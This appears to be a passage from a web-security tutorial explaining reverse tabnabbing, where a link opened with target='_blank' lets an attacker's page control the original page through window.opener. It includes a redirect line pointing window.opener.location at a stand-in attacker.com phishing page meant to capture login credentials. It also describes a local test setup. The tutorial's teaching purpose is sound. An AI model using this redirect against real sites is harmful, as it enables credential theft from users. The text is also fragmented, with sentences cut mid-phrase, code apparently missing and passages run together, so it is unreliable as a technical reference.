href
argument of an <a
tag with the attribute target="_blank" rel="opener"
that is going to be clicked by a victim, the attacker point this link to a web under his control (a malicious website). Then, once the victim clicks the link and access the attackers website, this malicious website will be able to control the original page via the javascript object window.opener
.
If the page doesn't have rel="opener"
but contains target="_blank"
it also doesn't have rel="noopener"
it might be also vulnerable.window.opener.location = https://attacker.com/victim.html
to a web controlled by the attacker that looks like the original one, so it can imitate the login form of the original website and ask for credentials to the user.python3 -m http.server
Then, access http://127.0.0.1:8000/
vulnerable.html, click on the link and note how the original website URL changes.opener.closed
: Returns a boolean value indicating whether a window has been closed or not.opener.frames
: Returns all iframe elements in the current window.opener.length
: Returns the number of iframe elements in the current window.opener.opener
: Returns a reference to the window that created the window.opener.parent
: Returns the parent window of the current window.opener.self
: Returns the current window.opener.top
: Returns the topmost browser window.